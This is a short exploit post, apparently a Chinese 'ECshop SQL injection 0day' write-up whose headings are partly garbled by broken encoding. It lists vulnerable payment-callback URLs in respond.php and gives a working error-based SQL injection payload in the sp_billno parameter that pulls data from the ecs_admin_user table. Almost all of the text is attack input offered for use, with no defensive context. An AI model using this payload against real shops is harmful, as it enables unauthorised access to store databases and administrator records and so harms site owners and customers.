ECshop ֧SQLע0day

©֤
respond.php?code=tenpay&attach=voucher&sp_billno=fjhgx
respond.php?code=cncard
respond.php?code=chinabank

EXP
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

 

respond.php?code=tenpay&attach=voucher&sp_billno=1
